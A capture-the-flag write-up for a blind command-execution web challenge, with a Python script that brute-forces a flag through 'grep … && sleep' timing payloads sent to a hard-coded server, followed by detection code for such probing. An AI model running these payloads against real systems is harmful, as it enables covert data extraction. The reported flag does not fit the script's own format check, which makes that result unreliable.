[Web] easyweb - Donek1

xp0int, posted on Sep 6 2020

This is command execution with no echoed output, confirmed with the sleep function. Attempts to trigger outbound HTTP and DNS requests got no result. The server probably does not allow connections back out, so the approach is to locate the flag and brute-force it directly.

https://250.ac.cn/2018/12/18/%E6%97%A0%E5%9B%9E%E6%98%BE%E7%9A%84%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E4%B9%8B%E5%88%A9%E7%94%A8/#%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9C%AA%E8%81%94%E7%BD%91

```
# -*- coding: utf-8 -*-
import re

import requests

# Expected flag layout: flag{8-4-4-4-12} in lowercase alphanumerics
flag_format = re.compile(r'flag\{[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\}')
all_letter = '-{}0123456789abcdefghijklmnopqrstuvwxyz;'  # candidate flag characters
alla = '/-_0123456789abcdefghijklmnopqrstuvwxyz;'        # candidate path characters
lujing = '/'                                             # path recovered so far


def get_flag(command):
    """Return True when the request times out, i.e. the sleep ran."""
    try:
        requests.post('http://119.3.37.185/', data={'cmd': command}, timeout=2.5)
    except requests.exceptions.Timeout:
        return True
    return False


if __name__ == '__main__':
    flag = 'flag{'
    while flag_format.match(flag) is None:
        status = 0
        for i in all_letter:
            payload = 'cat /flag.txt | grep %s && sleep 3' % (flag + i)
            # payload = 'find / -name flag 2>/dev/null | grep %s && sleep 3' % (lujing + i)
            print(payload)
            if get_flag(payload):
                status = 1
                flag += i
                print(flag)
                break
        if status == 0:
            # No candidate matched: drop the last character and retry
            flag = flag[0:-1]
```

flag:flag{kijbvstsbsnsj1d9bc8}
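
Seen from the server side, the probing above leaves a distinctive trail: many `grep ... && sleep` requests from one client whose guesses differ only in the last character. The following is an added example, not part of the original write-up; the record shape `(client, cmd)`, the sample data and the function name `find_timing_oracles` are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Matches the oracle shape used in the write-up: "... | grep <guess> && sleep <n>"
ORACLE = re.compile(r"\|\s*grep\s+(\S+)\s*&&\s*sleep\s+(\d+)")

# Constructed sample records (client address, submitted cmd value); not real traffic.
SAMPLE = [
    ("198.51.100.7", "cat /flag.txt | grep flag{a && sleep 3"),
    ("198.51.100.7", "cat /flag.txt | grep flag{b && sleep 3"),
    ("198.51.100.7", "cat /flag.txt | grep flag{k && sleep 3"),
    ("198.51.100.7", "cat /flag.txt | grep flag{k- && sleep 3"),
    ("198.51.100.7", "cat /flag.txt | grep flag{k0 && sleep 3"),
    ("203.0.113.9", "uptime"),
    ("203.0.113.9", "ls | grep log && sleep 1"),
]


def find_timing_oracles(records, min_guesses=3):
    """Return {client: sorted prefixes} for clients that sent at least
    min_guesses grep+sleep probes differing only in the final character."""
    siblings = defaultdict(lambda: defaultdict(set))
    for client, cmd in records:
        m = ORACLE.search(cmd)
        if m and len(m.group(1)) > 1:
            guess = m.group(1)
            # Group guesses by everything except the last character.
            siblings[client][guess[:-1]].add(guess[-1])
    hits = {}
    for client, by_prefix in siblings.items():
        swept = sorted(p for p, chars in by_prefix.items() if len(chars) >= min_guesses)
        if swept:
            hits[client] = swept
    return hits


if __name__ == "__main__":
    for client, prefixes in find_timing_oracles(SAMPLE).items():
        print(client, "swept characters after", prefixes)
```

A single `grep ... && sleep` from an administrator does not trip the check; the signal is the character sweep under one prefix, so `min_guesses` should be tuned to the traffic being reviewed.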